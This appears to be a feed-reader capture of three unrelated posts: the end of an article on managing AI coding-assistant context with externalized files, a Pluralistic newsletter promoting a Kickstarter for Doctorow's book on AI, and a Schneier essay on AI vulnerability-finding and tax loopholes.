Unfortunately a lot of developers read paragraphs like the last one and their eyes glaze over. Somehow it gets classified in the same part of our brains as learning how our build systems work: boring stuff we somehow don’t really want to think about because it takes us away from “real” programming. That’s a shame, because when we don’t understand the basics of how context works we waste a lot of time.

For example, here’s something I see developers do all the time that they absolutely shouldn’t. They’re deep into an AI coding session, and the AI has built up a detailed understanding of their codebase (e.g., it’s noticed patterns, it’s making good decisions, etc.). Then they start seeing “Compacting conversation” messages, or they notice the little context usage indicator in Cursor or Copilot filling up, and they don’t really know what that means. But they learned that closing the session and starting a new one seems to fix the problem. Unfortunately, all they’ve done is trade compaction for total amnesia. The new session just keeps going, producing output that looks fine, but it’s giving worse answers and generating worse code because it’s working from incomplete information.

The really weird thing is that I was writing about something really similar all the way back in 2006, long before AI was around, in Applied Software Project Management: Missing requirements are especially insidious because they’re difficult to spot. I was writing about requirements, not AI context, but the problem is the same. I’ve written about how prompt engineering is requirements engineering, and this is another place where the parallel holds up. When a requirement is missing, there’s no artifact to flag it, you just end up with code that doesn’t do what it’s supposed to do. When context is missing from an AI session, there’s no error message telling you what the AI forgot; you just end up with worse answers.

The cost of poor context management is actually measurable. A developer on Microsoft’s Dev Blog recently timed his own reorientation overhead and found he was spending over an hour a day just reexplaining things to his AI that it had known in a previous session. He’s not alone. There are now entire frameworks and managed services dedicated to giving agents persistent memory, from lightweight CLIs that query Copilot’s local session database to managed memory services from Cloudflare. Some of these tools are genuinely useful, but they’re solutions you need to evaluate, integrate, and maintain before they help you.

My goal in this article and the next is to give you four specific things you can do today, using whatever AI tools you’re already working with. This article covers the problem: why context management matters and how context loss affects the quality of your AI’s output. The next article covers the specific practices that emerged from building the Quality Playbook and Octobatch, things you can bring back to your own prompts, skills, and agents immediately. I’ll use real examples from those projects, because I think they’ve got some good examples that you can draw on.

We get AI wrong in both directions

I think the through line through all of this is that developers both overestimate and underestimate AI. We overestimate how much it can hold in its memory and its ability to remember things and make decisions for us. So we’ll just stuff a whole bunch of stuff in the context window and assume the AI will work it out, and then get annoyed when it hallucinates or forgets.

On the other hand, we massively underestimate its ability as an orchestrator. Your prompt doesn’t just have to ask a question or ask the AI to generate something. You can give it a multistep workflow where each step writes its results to files, and the AI will coordinate the whole thing, spinning off subtasks and picking up where it left off if something breaks.

When developers don’t take either of those things seriously, context management or orchestration, you get a specific cycle. They treat the context window as infinite and cram everything in. Then when the session gets too long and the AI starts losing track, they throw it all away and start fresh. They never consider the alternative, which is designing the workflow so the AI works from externalized files across independent sessions.

I discovered this while building the Quality Playbook. The context management was working so well inside my sessions that I realized the sessions themselves were the bottleneck. I was running the playbook in a single prompt. I think I had a record of over 15 million tokens in a single Copilot GPT-5.4 session that ran for hours, and I did eight of them in parallel. Which incidentally is why I got rate-limited for 54 hours from Copilot, which is completely fair.

The playbook was writing everything down to files as it went, which is why those runs could last that long at all. But I didn’t want that behavior. Running 15 million tokens in a single session is expensive, and if you’re on pay-as-you-go API tokens instead of a flat-rate plan like Copilot or Claude Max or Cursor, that kind of usage can be a real shock. I wanted to make the playbook available to developers who don’t want to burn that much at once. And because the context was already externalized to files, splitting into independent phases turned out to be easy.

Ask the AI to write its context down along the way

Before I get into how the pipeline splits things up, I want to talk about the practice that made the split possible in the first place: storing development context in files as you go.

I don’t mean asking the AI to export its notes at the end of a session, or writing up a “lessons learned” document after the fact. I mean baking it into the actual instructions you give the AI from the start, so it’s continually writing and updating context as it works. For Octobatch, the batch LLM orchestrator that was my first experiment in agentic engineering (I wrote about the development process in “The Accidental Orchestrator”), I had the AI write developer context in every folder, and that really made it easy to spin up a new session.

Here’s what that looks like in practice. Every new Claude Code session on Octobatch starts with a single line: “Read ai_context/DEVELOPMENT_CONTEXT.md and bootstrap yourself to continue development.” That file contains a loading sequence: read this first, then fan out to component-level CONTEXT.md files in scripts/, tui/, pipelines/, each describing its own subsystem at the right level of detail. By the time the AI finishes reading, it knows what the project is, how it’s built, what’s currently in progress, and what the active bugs are.

I think of this as shifting left. Instead of putting constraints in every prompt (don’t use additionalProperties: false, always test with –limit 3), those rules live in the CONTEXT.md files. The prompt stays clean because the documentation does the heavy lifting.

And updating context files is part of every task. Before we commit anything, I have the AI review the context files and make sure they reflect what we just did. If we added a feature or fixed a bug, the context file should reflect that before we commit. Stale context causes the same kinds of problems as stale documentation, except it’s worse because the AI is actually relying on it to make decisions.

I want to be clear exactly what I mean by “development context.” Specifically, it’s the information a new AI session needs to get up to speed: what the project is, how it’s built, and what decisions have been made along the way. Tools like Claude Code read development context from files like AGENTS.md (and you can actually go to that website to learn more) at the start of every session, and if you do a thorough enough job of building up your development context and keeping it up-to-date, you can get them fully bootstrapped. They’re the blueprints for your AI sessions. I wrote in Applied Software Project Management that building software without requirements is similar to building a house without blueprints. Running AI sessions without externalized context is the same mistake. You’re relying on what’s in someone’s head instead of what’s written down. And when you’re working with AI, “someone’s head” is a context window that’s going to get compacted or thrown away.

The most important thing is that what’s in my head matches what’s in the AI’s head. The context file is just a convenient way to help us figure out whether or not we agree. When I start a new Claude Code session on a folder that has a good DEVELOPMENT_CONTEXT.md, the AI reads it and we’re immediately aligned. When I start a session without one, the AI has to rediscover everything from scratch, and it always misses things. Rediscovery is always lossy.

If you’re not already writing context files as part of your workflow, none of the fancier techniques I’m about to describe matter. This is the foundation.

Include the why, or the AI will undo your decisions

There’s a specific thing that has to go into these context files, and it took me a while to learn why it matters so much: the reasoning behind every decision.

Octobatch’s DEVELOPMENT_CONTEXT.md has a section called “Key Technical Learnings” with 49 entries, each in a specific format: What happened, Why it matters, When we discovered it, and Where in the code it applies. At the top of that section is a note in bold: “IMPORTANT: Always include the REASONING (the ‘Why’) for each learning. This prevents future sessions from ‘refactoring’ a deliberate decision.”

That note is there because without it, the AI will do exactly that. I had a case with Octobatch where we used recursive set_timer() instead of set_interval() for auto-refresh because Textual’s set_interval() callbacks aren’t reliably serviced on pushed screens. Without the “Why” in the context file, a future session would look at that code, see a “cleaner” alternative, and helpfully refactor it right back to the broken approach.

The same principle applies to quality standards. Don’t just say “90% coverage for core logic.” Say “90% coverage for core logic, because expression evaluation touches randomness and seeding, where subtle bugs produce plausible-but-wrong output. The drunken sailor reseeding bug passed all visual inspection. Only statistical verification caught that sequential seeds created correlation bias (77.5% fell in water instead of a theoretical 50/50).” Without the “why,” a future AI session will argue the coverage target down. Any standard or architectural decision or unusual code pattern that doesn’t have its rationale attached is vulnerable to being optimized away by an AI that doesn’t know what problem it was solving.

The garbage collection problem

A lot of people like to talk about the context window as your AI’s short-term or working memory, and context that’s persisted to disk as long-term memory. Personally, I’m not sure those analogies to human memory work all that well. I think it’s a lot more useful to find ways to think about context that are similar to how we manage memory in our code.

I find it especially helpful to compare context compaction to garbage collection—again, not a perfect analogy but a useful one. When you look at a GC graph in Java, you see the memory slowly fill up and then suddenly drop after each GC. That drop is the runtime figuring out what’s still being referenced and freeing everything else.

The context window does the same thing. Your conversation accumulates tokens, the AI’s context window fills up, and then compaction happens. The tool (or the model) decides what to keep and what to throw away. Compaction is lossy and automatic, and you don’t control what survives.

Java developers spent decades learning to design their allocation patterns so garbage collection wouldn’t destroy anything important. AI developers need to learn the same thing, and the learning curve should be shorter because the concepts transfer directly.

When you ask the AI to write important state to files, you’re promoting it out of that volatile space. It’s surprisingly easy to do this. Just pass the AI to write its context to a Markdown file. For example, you can put all of the context related to a specific domain into a particular file, like if the AI noticed a behavioral contract, you could have it write all the related context to a file called CONTRACTS.md. If it made a design decision, that could go into DEVELOPMENT_CONTEXT.md—that’s a pattern I use all the time to write down all the important contacts needed to bootstrap a new AI session to work on the code. Those files live on disk, outside the context window, and compaction can’t touch them. But if you start a new session without externalizing any of this, you’re shutting down the application and losing everything that was in memory.

The first time I built Octobatch’s batch orchestrator, it was a Python script with in-memory state and a lot of hope. It worked for small batches but fell apart at scale, which is pretty much what most developers are doing with their AI context right now: keeping everything in the context window and hoping it holds together, even though that stops working once sessions get long and codebases get complex.

It’s way too easy to fall into one context management extreme or the other

The Quality Playbook exists in part because of this problem. When I was building the requirements pipeline, I discovered that single-pass requirement generation runs out of attention after about 70 requirements. The model forgets behavioral contracts it noticed earlier. And it’s completely invisible. You don’t get a stack trace or an error message or any kind of warning, just incomplete output and no way to know what’s missing.

The longer a defect goes uncorrected, the more entrenched it becomes and the more things get built on top of it. Context drift works the same way. When the AI loses track of a design decision early in a session, everything built on that lost context compounds the error. And just like a late-discovered defect, you don’t know what went wrong because the original context is gone.

I had a concrete example when I was running the playbook against virtio-win. Version 1.3.32 found four bugs. Version 1.3.33, after some changes, found only one. That regression was only diagnosable because I had EXPLORATION.md, an externalized intermediate state file that captures what the AI observed during its exploration phase. Without it, the only observable output would have been “fewer bugs this time.” I had no way to tell whether the playbook was worse, or the bugs were harder, or it had just missed something. Without externalized state, I couldn’t have answered any of those questions.

The contracts file in the pipeline exists specifically to solve this. When the model forgets about a behavioral contract it noticed earlier, that forgetting is normally invisible. But with a contracts file, every observation is written down before any requirements work begins. If a contract is in the file but has no corresponding requirement, that’s a visible, greppable gap. You can see what was forgotten and fix it.

But it’s just as easy to overcompensate. If the LLM has to constantly hop between eight different reference files, its context window fragments and you start getting hallucinations. I’ve seen this happen. You load all your context files and requirements documents and design docs into the session, and the AI gets worse, not better. It spends all its attention navigating between reference files instead of thinking about the problem.

I hit this with the Quality Playbook when I expanded the scope of a run against virtio-win from 10 files to about 60. The result was 6x more files analyzed but 75% fewer bugs found. The model burned its context on device drivers instead of going deep on the transport layer where the bugs actually were. Wider scope meant shallower analysis.

The goal isn’t to save everything. You have to decide what to externalize, what to keep in context, and what to let go. The best context file contains exactly what the AI needs for this session and nothing more.

Helping your AI manage its context helps you too

The interesting thing about all of this is that good context management really makes use of your development expertise, and it’s one of those things that makes you a better developer the more you do it. Every practice I’ve described in this article, writing down your decisions, recording why you made them, being deliberate about what goes into a session and what doesn’t, is something developers have always been told to do. We write ADRs and design docs and inline comments explaining nonobvious choices, and we all know we should do more of it. When you’re working with AI, the cost of not doing it becomes immediate and visible. Your context files end up being the project documentation you should have been writing all along, except now there’s something on the other end that will actually go wrong if you skip it.

And once you start thinking about context as something you actively manage, you can start designing your workflows around it. That’s what happened with the Quality Playbook, when it went from a single 15-million-token session to a set of independent phases with clean handoffs between them, and the whole split worked on the first try because the context was already externalized to files.

In the next article, I’ll get into the specific techniques you can use today in your AI agents, but also in your day-to-day AI development work.

The Quality Playbook is open source and works with GitHub Copilot, Cursor, and Claude Code. It’s also available as part of awesome-copilot.


Disclosure: Aspects of the approach described in this article are the subject of US Provisional Patent Application No. 64/044,178, filed April 20, 2026 by the author. The open-source Quality Playbook project (Apache 2.0) includes a patent grant to users of that project under the terms of the Apache 2.0 license.

12:14

Pluralistic: Kickstarting "The Reverse Centaur's Guide to Life After AI" (14 May 2026) [Pluralistic: Daily links from Cory Doctorow]

->->->->->->->->->->->->->->->->->->->->->->->->->->->->-> Top Sources: None -->

Today's links



A mockup of a smartphone displaying an audiobook app that's playing 'The Reverse Centaur's Guide to Life After AI'. Next to it appears this text: 'This book - ostensibly about AI, but more broadly about the new world of hyper-capitalism and high tech - is stunning in its clarity and breadth of vision. In trying to keep some kind of grasp on what is going on in the world, I read Doctorow obsessively. —Brian Eno'

Kickstarting "The Reverse Centaur's Guide to Life After AI" (permalink)

My next book, The Reverse Centaur's Guide to Life After AI, will be out in about a month – and (once again) Amazon's monopoly audiobook platform refuses to carry it, and so (once again) I'm pre-selling the audio, ebook and print edition in a Kickstarter campaign that proves that DRM-free isn't just the right way to reach an audience, it's also the best way to reach them:

https://www.kickstarter.com/projects/doctorow/the-reverse-centaurs-guide-to-life-after-ai

A mockup of a smartphone displaying an audiobook app that's playing 'The Reverse Centaur's Guide to Life After AI'. Next to it appears this text: 'An eye-opening take on AI . . . A sharply worded, irreverent, and deadly serious call to see through the sleight-of-hand performance of AI promoters. —Kirkus Reviews'

Reverse Centaur is a book about the realpolitik and the political economy of AI, written by a tech critic (me!) who is sick to the back teeth of hearing about AI. Central to the book's thesis:

  • The AI bubble is exceptionally bad and dangerous:

https://pluralistic.net/2026/05/07/dump-the-pumpers/#alpo-eaters-anonymous

A mockup of a smartphone displaying an audiobook app that's playing 'The Reverse Centaur's Guide to Life After AI'. Next to it appears this text: 'A bracing, daringly optimistic plan for how we can free ourselves from the awfulness. —John Hodgman (on Enshittification)'

  • The AI bubble is part of a lineage of pump-and-dump swindles created by monopolists who are desperate to convince investors that they can continue to grow even after they've saturated their markets:

https://pluralistic.net/2025/03/06/privacy-last/#exceptionally-american

  • In service to that stock swindle, AI companies have cooked up all kinds of ways to "juke the stats" to paint a false picture of AI adoption:

https://pluralistic.net/2025/05/02/kpis-off/#principal-agentic-ai-problem

A mockup of a smartphone displaying an audiobook app that's playing 'The Reverse Centaur's Guide to Life After AI'. Next to it appears this text: 'A masterly polemic, its scope so sweeping that it does, finally, seem to explain every pungent odor wafting from Silicon Valley. —Harper՚s (on Enshittification)'

  • AI is a normal technology, and in the absence of the bubble, we'd call this collection of technically interesting, sometimes useful tools "plug-ins":

https://pluralistic.net/2026/02/19/now-we-are-six/#stock-buyback

  • A chatbot can't do your job, but an AI salesman can absolutely convince your boss to fire you and replace you with a chatbot that can't do your job:

https://pluralistic.net/2025/03/18/asbestos-in-the-walls/#government-by-spicy-autocomplete

  • Despite the fact that the AI can't do your job, there are many ways that AI can be used to erode your wages and working conditions:

https://pluralistic.net/2026/04/06/empiricism-washing/#veena-dubal

  • The workers who say that their jobs are worse and the things they produce are much worse as a result of AI are correct; but the workers who say their work is much better thanks to AI are also correct. This only seems like a riddle until you understand that the most important fact about any technology (including AI) isn't what it does, but who it does it for and who it does it to:

https://pluralistic.net/2025/09/11/vulgar-thatcherism/#there-is-an-alternative

A mockup of a smartphone displaying an audiobook app that's playing 'The Reverse Centaur's Guide to Life After AI'. Next to it appears this text: 'You could not ask for a clearer, more ambitious or better-written business book than this one . . . Doctorow deserves thanks for his service. —The Financial Times (on Enshittification)'

  • When a boss fires a worker and gives their jobs to an AI, it usually means that they don't care if that job is done well, which is why customer service jobs are being handed over to AI:

https://pluralistic.net/2025/08/06/unmerchantable-substitute-goods/#customer-disservice

  • Bosses also love firing coders and replacing them with AI – first, because bosses are really angry about the decades when tech workers were in short supply and bosses had to pretend to like them, and second, because if you're selling AI as a way to replace workers, what better way to convince a potential customer than to fire the workers your own company depends upon? (All that said, the coders who are excited about their new AI coding tools have a point – when a worker is in charge of their work and thus when and how they use a tool, we should defer to their own experience):

https://pluralistic.net/2025/08/05/ex-princes-of-labor/#hyper-criti-hype

  • Artists are also a favorite target of AI bosses, which is weird, because the wages of creative workers add up to a total that rounds to zero when compared with the unimaginably large sums AI companies will have to take in if they are to pay back the trillions they've spent to date (let alone the trillions more they're proposing to spend in the near term). All of this raises a foundational question: can AI "art" ever be good? (Spoiler: probably not):

https://pluralistic.net/2025/03/25/communicative-intent/#diluted

  • Media companies say they have the answer to the AI art question: they'll create (or assert) a copyright that lets them control AI training. This is an incredibly transparent ruse: media companies are artists' class enemies, and if we get a new right to control AI training, our bosses will demand that we sign it away to them as part of their non-negotiable, one-sided standard contracts:

https://pluralistic.net/2024/11/18/rights-without-power/#careful-what-you-wish-for

A mockup of a smartphone displaying an audiobook app that's playing 'The Reverse Centaur's Guide to Life After AI'. Next to it appears this text: 'Essential to understanding today’s digital economy. —Rohit Chopra, Former head of the Consumer Financial Protection Bureau (on Enshittification)'

  • For creative workers, the answer to these new would-be tech bosses isn't asserting a new right that will be expropriated by the old media bosses who've been ripping us off forever. Our salvation lies in leaning into the US Copyright Office's interpretation that holds that AI-generated works can't be copyrighted, because copyright is only for human creations. That means that the only way our bosses can get a copyright over the things they want to sell is to pay us to make them:

https://pluralistic.net/2026/03/03/its-a-trap-2/#inheres-at-the-moment-of-fixation

  • Many of the seemingly urgent AI questions that people won't shut up about are distractions, because they assume that AI will lastingly infiltrate every part of our society. In reality, the AI companies are losing unimaginable amounts and have no path to profitability:

https://pluralistic.net/2025/06/30/accounting-gaffs/#artificial-income

  • The only jobs that AI can do better than humans are jobs that shouldn't exist, like figuring out how to maximize undetectable wage-theft:

https://pluralistic.net/2024/12/18/loose-flapping-ends/#luigi-has-a-point

  • AI is also really good at figuring out how to do individualized price-gouging, another thing that shouldn't exist:

https://pluralistic.net/2026/01/21/cod-marxism/#wannamaker-slain

  • Despite AI's manifest unsuitability to do jobs that should exist, bosses keep firing people and replacing them with chatbots that do their jobs very badly. This allows bosses to indulge their solipsistic fantasy of a world without people, in which customers, workers and suppliers are statistical artifacts and bosses are unitary geniuses who simply imagine a product or service and then it is delivered, without any ego-shattering confrontations with people who know how to do things:

https://pluralistic.net/2026/01/05/fisher-price-steering-wheel/#billionaire-solipsism

  • This is catastrophic, and not just for the parties involved today. The AI bubble will pop, and when it does, the chatbots that do these jobs (badly) will be switched off. Meanwhile, the workers those chatbots replaced will have retrained, retired, or become "discouraged." No one will be around to do those (necessary) jobs. AI is the asbestos we are shoveling into the walls of our civilization and our descendants will be digging it out for generations:

https://pluralistic.net/2025/09/27/econopocalypse/#subprime-intelligence

  • The real existential AI threat isn't that we'll accidentally teach the word-guessing program so many words that it awakens and becomes a vengeful god. The real risk is that when the bubble bursts we'll indulge the ruling class's reflex to austerity, and that this will continue the decades of mass economic traumatization that makes people into easy marks for fascists:

https://pluralistic.net/2026/04/12/always-great/#our-nhs

  • But when the AI bubble pops, that won't be the end of AI – it will be the end of the bubble. When the AI bubble pops, we'll have mountains of GPUs at fire-sale prices, skilled workers liberated from the imperative to help their bosses promote their stock swindle, and open source models that will yield tremendous dividends to anyone who sets out to optimize them:

https://pluralistic.net/2025/10/16/post-ai-ai/#productive-residue

As you can see from the links above, I developed The Reverse Centaur's Guide to Life After AI in the same way that I developed Enshittification: in public, through a series of essays, which I periodically synthesized into major, widely shared speeches:

https://pluralistic.net/2025/12/05/pop-that-bubble/#u-washington

Making my working notes public is a hugely effective way of producing and refining critical work, and it's been my method for 25 years now:

https://pluralistic.net/2021/05/09/the-memex-method/

It's a method that's let me produce a string of international bestsellers, published by some of the largest publishers in the world. Nevertheless, Amazon refuses to carry my audiobooks:

https://pluralistic.net/2022/07/25/can-you-hear-me-now/#acx-ripoff

That's because I have an iron-clad requirement that my work be sold in open formats, without the "digital rights management" that blocks you from moving the books you bought on Amazon to someone else's apps. Digital rights management (DRM) enjoys bizarre legal protections so that it's a felony for me to give you the tools you need to move the books I wrote out of an Amazon app and into a competitor's app:

https://pluralistic.net/2026/01/14/sole-and-despotic/#world-turned-upside-down

What's more, these outrageous legal rights extend around the world, because the US Trade Representative spent decades bullying America's trading partners into passing laws that criminalize the act of fixing the defects in America's tech exports, which is why farmers can't fix their John Deere tractors, hospitals can't fix their Medtronic ventilators, and no one can sell you an app that stops Apple and Google from spying on your phone:

https://pluralistic.net/2026/01/01/39c3/#the-new-coalition

Amazon's Audible controls 90% (!) of the audiobook market, and they will not sell any book unless they can permanently lock it to their platform. That means that every time a writer sells you an audiobook on Audible, they create a "switching cost" that stops you from leaving Audible for a competitor. Not only is this fundamentally unjust, it's also terrible for creators: if our audiences can't leave Amazon, then we can't leave Amazon either, which means Amazon can (and does!) steal millions of dollars from writers without losing our business:

https://pluralistic.net/2022/09/07/audible-exclusive/#audiblegate

Which is where these Kickstarter campaigns come in. Whenever I sell a new book to a publisher, I arrange to make my own independent audiobook for it, which I sell everywhere except the platforms that have mandatory DRM: Audible, Apple and Audiobooks.com. There are some very good DRM-free audiobook stores, notably Libro.fm and Downpour.com (Google Play also sells audiobooks without DRM). But most people have never heard of these, so it wasn't until I started pre-selling my audiobooks on Kickstarter that I was able to make my stubborn refusal to sell out to Audible into a paying proposition. My agent tells me that if I'd sold out to Audible, I'd have paid off my mortgage and I'd be able to give my kid a full ride through a fancy US college. I don't make that kind of money from these Kickstarters, but they do very well nevertheless, and they're a critical part of my family's finances.

The Kickstarter is live for the next three weeks:

https://www.kickstarter.com/projects/doctorow/the-reverse-centaurs-guide-to-life-after-ai

A mockup of 'The Reverse Centaur's Guide to Life After AI' and 'Enshittification' on e-readers, and smartphones displaying audiobook apps, as well as the paperback edition of 'Reverse Centaur.'

You can pre-order print copies of Reverse Centaur, as well as DRM-free ebooks and audiobooks (narrated by me!) for Reverse Centaur and Enshittification. Normally, I offer custom-signed copies of the print books, but Enshittification was so successful that I haven't stopped touring it and I'm in a new city every couple of days, so there's no way I can reliably get into a warehouse to sign the latest batch of orders. Instead, I'll be posting the contact details for every bookstore that's hosting me on my tours (US in June, UK in September) and you can order signed copies from them, which I'll personalize after my events there so they can ship them to you.

I've also decided to raise money for the Electronic Frontier Foundation (eff.org), the nonprofit I've worked at for nearly 25 years. EFF is the oldest, best and most effective tech rights organization in the world, and its mission has only gotten more important over the years. EFF's outreach folks are offering a special membership package for backers of the Kickstarter, which includes an EFF hat and stickers, as well as an Enshittification pin and two Enshittification stickers:

https://pluralistic.net/2026/04/24/poop-emoji-plus-plus/#devin-washburn

The audiobook is fully recorded and finalized and you can listen to the first hour of it here:

https://archive.org/details/reverse-centaur-audio-sample

It came out great (as always!), thanks to the terrific direction of Gabrielle De Cuir of Skyboat Media and editing from Wryneck Studios' John Taylor Williams. Gabrielle's directed all my audiobooks since 2017, and John's been mastering my podcasts since 2006 (!!), so we constitute a very well-oiled machine.

Working out my ideas in public allows me to produce my Pluralistic newsletter, and with it, a large volume of free, high-quality work that's licensed under a generous Creative Commons license that lets anyone reproduce, translate, redistribute and even sell my articles. If you've enjoyed that work, I hope you'll consider backing the campaign! Selling books is how I pay the bills and keep the lights on, and as ever, this is the only way you can get a major publisher's ebooks and audiobooks with no DRM and no "terms of service." These are truly ebooks and audiobooks that you own. You can sell them, give them away, or lend them out – so long as you don't violate copyright law, we're all cool:

https://www.kickstarter.com/projects/doctorow/the-reverse-centaurs-guide-to-life-after-ai


Hey look at this (permalink)



A shelf of leatherbound history books with a gilt-stamped series title, 'The World's Famous Events.'

Object permanence (permalink)

#25yrsago RIP, Douglas Adams http://news.bbc.co.uk/1/hi/uk/1326657.stm

#20yrsago Douglas Coupland models his life & books on net rumors about him https://web.archive.org/web/20060515220320/https://www.wired.com/wired/archive/14.05/posts.html?pg=6

#15yrsago Vindictive lumber baron’s far-flung heirs inherit, 91 years after his death https://abcnews.com/Business/lumber-barons-descendants-receive-inheritance-92-years-death/story?id=13569633

#15yrsago R2D2 trashcan https://web.archive.org/web/20171208014511/https://i.imgur.com/x3w0I.jpg

#15yrsago Napier’s Bones: math and mysticism make for great international adventure https://memex.craphound.com/2011/05/12/napiers-bones-math-and-mysticism-make-for-great-international-adventure/

#15yrsago China’s shonky Disneyland-a-like park closed https://web.archive.org/web/20110515073221/https://thedisneyblog.com/2011/05/13/fake-disney-theme-park-in-china-forced-to-close/

#10yrsago Open letter to from EFF to members of the W3C Advisory Committee https://www.eff.org/deeplinks/2016/05/open-letter-members-w3c-advisory-committee

#10yrsago Gallery show of forks stolen from rich people, sealed to preserve crumbs & saliva https://web.archive.org/web/20160505183026/https://www.theguardian.com/artanddesign/2016/apr/27/crumbs-and-all-prince-harry-hillary-clinton-and-julia-gillard-have-cutlery-swiped-for-exhibition

#10yrsago German publishers owe writers €100M in misappropriated royalties https://uebermedien.de/4444/schoener-verlegen-mit-dem-geld-anderer-leute/

#10yrsago Chinese state-backed corporations beat US lawsuits with sovereign immunity https://www.reuters.com/article/us-china-usa-companies-lawsuits-idUSKCN0Y2131/

#10yrsago Anal fisting site breached: 100K passwords, usernames, email addresses and IPs extracted https://web.archive.org/web/20160511121337/https://motherboard.vice.com/read/rosebuttboard-ip-board

#10yrsago Reading With Pictures: awesome, classroom-ready comics for math, social studies, science and language arts https://memex.craphound.com/2016/05/12/reading-with-pictures-awesome-classroom-ready-comics-for-math-social-studies-science-and-language-arts/

#5yrsago Crooked Timber's Ministry for the Future Seminar https://pluralistic.net/2021/05/12/seminar-for-the-future/#imaginations

#1yrago Trump can't do ANYTHING for his base https://pluralistic.net/2025/05/12/greased-slide/#greased-pole


Upcoming appearances (permalink)

A photo of me onstage, giving a speech, pounding the podium.



A screenshot of me at my desk, doing a livecast.

Recent appearances (permalink)



A grid of my books with Will Stahle covers..

Latest books (permalink)



A cardboard book box with the Macmillan logo.

Upcoming books (permalink)

  • "The Reverse-Centaur's Guide to AI," a short book about being a better AI critic, Farrar, Straus and Giroux, June 2026 (https://us.macmillan.com/books/9780374621568/thereversecentaursguidetolifeafterai/)
  • "Enshittification, Why Everything Suddenly Got Worse and What to Do About It" (the graphic novel), Firstsecond, 2026

  • "The Post-American Internet," a geopolitical sequel of sorts to Enshittification, Farrar, Straus and Giroux, 2027

  • "Unauthorized Bread": a middle-grades graphic novel adapted from my novella about refugees, toasters and DRM, FirstSecond, April 20, 2027

  • "The Memex Method," Farrar, Straus, Giroux, 2027



Colophon (permalink)

Today's top sources:

Currently writing: "The Post-American Internet," a sequel to "Enshittification," about the better world the rest of us get to have now that Trump has torched America. Third draft completed. Submitted to editor.

  • "The Reverse Centaur's Guide to AI," a short book for Farrar, Straus and Giroux about being an effective AI critic. LEGAL REVIEW AND COPYEDIT COMPLETE.
  • "The Post-American Internet," a short book about internet policy in the age of Trumpism. PLANNING.

  • A Little Brother short story about DIY insulin PLANNING


This work – excluding any serialized fiction – is licensed under a Creative Commons Attribution 4.0 license. That means you can use it any way you like, including commercially, provided that you attribute it to me, Cory Doctorow, and include a link to pluralistic.net.

https://creativecommons.org/licenses/by/4.0/

Quotations and images are not included in this license; they are included either under a limitation or exception to copyright, or on the basis of a separate license. Please exercise caution.


How to get Pluralistic:

Blog (no ads, tracking, or data-collection):

Pluralistic.net

Newsletter (no ads, tracking, or data-collection):

https://pluralistic.net/plura-list

Mastodon (no ads, tracking, or data-collection):

https://mamot.fr/@pluralistic

Bluesky (no ads, possible tracking and data-collection):

https://bsky.app/profile/doctorow.pluralistic.net

Medium (no ads, paywalled):

https://doctorow.medium.com/

Tumblr (mass-scale, unrestricted, third-party surveillance and advertising):

https://mostlysignssomeportents.tumblr.com/tagged/pluralistic

"When life gives you SARS, you make sarsaparilla" -Joey "Accordion Guy" DeVilla

READ CAREFULLY: By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer.

ISSN: 3066-764X

How Dangerous Is Anthropic’s Mythos AI? [Schneier on Security]

Last month, Anthropic made a remarkable announcement about its new model, Claude Mythos Preview: it was so good at finding security vulnerabilities in software that the company would not release it to the general public. Instead, it would only be available to a select group of companies to scan and fix their own software.

The announcement requires context—but it contained an essential truth.

While Anthropic’s model is really good at finding software vulnerabilities, so are other models. The UK’s AI Security Institute found that OpenAI’s GPT-5.5, already generally available, is comparable in capability. The company Aisle reproduced Anthropic’s published results with smaller, cheaper models.

At the same time, Anthropic’s refusal to publicly release its new model makes a virtue out of necessity. Mythos is very expensive to run, and the company doesn’t appear to have the resources for a general release. What better way to juice the company’s valuation than to hint at capabilities but not prove them, and then have others parrot their claims?

Nonetheless, the truth is scary. Modern generative AI systems—not just Anthropic’s, but OpenAI’s and other, open-source models—are getting really good at finding and exploiting vulnerabilities in software. And that has important ramifications for cybersecurity: on both the offense and the defense.

Attackers will use these capabilities to find, and automatically hack, vulnerabilities in systems of all kinds. They will be able to break into critical systems around the world, sometimes to plant ransomware and make money, sometimes to steal data for espionage purposes, and sometimes to control systems in times of hostility. This will make the world a much more dangerous, and more volatile, place.

But at the same time, defenders will use these same capabilities to find, and then patch, many of those same systems. For example, Mozilla used Mythos to find 271 vulnerabilities in Firefox. Those vulnerabilities have been fixed, and will never again be available to attackers. In the future, AIs automatically finding and fixing vulnerabilities in all software will be a normal part of the development process, which will result in much more secure software.

Of course, it’s not that simple. We should expect a deluge of both attackers using newly found vulnerabilities to break into systems, and at the same time much more frequent software updates for every app and device we use. But lots of systems aren’t patchable, and many systems that are don’t get patched, meaning that many vulnerabilities will stick around. And it does seem that finding and exploiting is easier than finding and fixing. All of this points to a more dangerous short-term future. Organizations will need to adapt their security to this new reality.

But it’s the long term that we need to focus on. Mythos isn’t unique, but it’s more capable than many models that have come before. And it’s less capable than models that will come after. AIs are much better at writing software than they were just six months ago. There’s every reason to believe that they will continue to get better, which means that they will get better at writing more secure software. The endgame gives AI-enhanced defenders advantages over AI-enhanced attackers.

Even more interesting are the broader implications. The same searching, pattern-matching and reasoning capabilities that make these models so good at analyzing software almost certainly apply to similar systems. The tax code isn’t computer code, but it’s a series of algorithms with inputs and outputs. It has vulnerabilities; we call them tax loopholes. It has exploits; we call them tax avoidance strategies. And it has black hat hackers: attorneys and accountants.

Just as these models are finding hundreds of vulnerabilities in complex software systems, we should expect them to be equally effective at finding many new and undiscovered tax loopholes. I am confident that the major investment banks are working on this right now, in secret. They’ve fed AI the tax code of the US, or the UK, or maybe every industrialized country, and tasked the system with looking for money-saving strategies. How many tax loopholes will those AIs find? Ten? One hundred? One thousand? The Double Dutch Irish Sandwich is a tax loophole that involves multiple different tax jurisdictions. Can AIs find loopholes even more complex? We have no idea.

Sure, the AIs will come up with a bunch of tricks that won’t work, but that’s where those attorneys and accountants come in—to verify, and then justify, the loopholes. And then to market them to their wealthy clients.

As goes the tax code, so goes any other complex system of rules and strategies. These models could be tasked with finding loopholes in environmental rules, or food and safety rules—anywhere there are complex regulatory systems and powerful people who want to evade those rules.

